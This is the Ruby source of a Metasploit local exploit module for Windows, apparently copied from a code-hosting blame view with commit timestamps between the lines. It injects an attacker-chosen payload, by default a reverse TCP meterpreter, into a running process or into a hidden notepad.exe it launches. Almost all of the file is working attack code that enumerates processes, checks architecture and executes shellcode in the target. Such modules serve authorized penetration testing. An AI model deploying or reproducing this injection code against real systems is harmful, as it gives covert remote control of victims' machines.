metasploit-framework/modules/exploits/windows/local/payload_inject.rb

156 lines
4.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Local
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2014-06-01 10:51:06 +00:00
include Msf::Post::Windows::Process
2014-06-01 10:50:13 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info( info,
2016-07-01 14:05:03 +00:00
'Name' => 'Windows Manage Memory Payload Injection',
'Description' => %q{
2013-08-30 21:28:54 +00:00
This module will inject a payload into memory of a process. If a payload
isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID
datastore option isn't specified, then it'll inject into notepad.exe instead.
},
2016-07-01 14:05:03 +00:00
'License' => MSF_LICENSE,
'Author' =>
2013-08-30 21:28:54 +00:00
[
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'sinn3r'
],
2016-07-01 14:05:03 +00:00
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
2016-07-01 14:05:03 +00:00
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
2016-07-01 14:05:03 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => "Oct 12 2011"
2013-08-30 21:28:54 +00:00
))
register_options(
[
OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
], self.class)
end
# Run Method for when run command is issued
def exploit
@payload_name = datastore['PAYLOAD']
@payload_arch = framework.payloads.create(@payload_name).arch
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
pid = get_pid
if not pid
print_error("Unable to get a proper PID")
return
end
2014-06-01 10:50:13 +00:00
inject_into_pid(pid)
2013-08-30 21:28:54 +00:00
end
# Figures out which PID to inject to
def get_pid
pid = datastore['PID']
if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
print_status("Launching notepad.exe...")
pid = create_temp_proc
end
return pid
end
# Determines if a PID actually exists
def has_pid?(pid)
procs = []
begin
procs = client.sys.process.processes
rescue Rex::Post::Meterpreter::RequestError
print_error("Unable to enumerate processes")
return false
end
procs.each do |p|
found_pid = p['pid']
return true if found_pid == pid
end
print_error("PID #{pid.to_s} does not actually exist.")
return false
end
# Checks the Architeture of a Payload and PID are compatible
# Returns true if they are false if they are not
def arch_check(pid)
# get the pid arch
client.sys.process.processes.each do |p|
# Check Payload Arch
if pid == p["pid"]
vprint_status("Process found checking Architecture")
if @payload_arch.first == p['arch']
vprint_good("Process is the same architecture as the payload")
return true
else
print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.")
return false
end
end
end
end
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.sys.config.getenv('windir')
2013-08-30 21:28:54 +00:00
# Select path of executable to run depending the architecture
if @payload_arch.first== ARCH_X86 and client.arch == ARCH_X86
2013-08-30 21:28:54 +00:00
cmd = "#{windir}\\System32\\notepad.exe"
elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X64
2013-08-30 21:28:54 +00:00
cmd = "#{windir}\\System32\\notepad.exe"
elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X86
2013-08-30 21:28:54 +00:00
cmd = "#{windir}\\Sysnative\\notepad.exe"
elsif @payload_arch.first == ARCH_X86 and client.arch == ARCH_X64
2013-08-30 21:28:54 +00:00
cmd = "#{windir}\\SysWOW64\\notepad.exe"
end
begin
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
2013-08-30 21:28:54 +00:00
rescue Rex::Post::Meterpreter::RequestError
return nil
end
return proc.pid
end
def inject_into_pid(pid)
vprint_status("Performing Architecture Check")
return if not arch_check(pid)
begin
print_status("Preparing '#{@payload_name}' for PID #{pid}")
2014-06-01 10:50:13 +00:00
raw = payload.encoded
execute_shellcode(raw, nil, pid)
2013-08-30 21:28:54 +00:00
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to inject payload:")
print_line(e.to_s)
end
end
2013-01-29 20:22:19 +00:00
end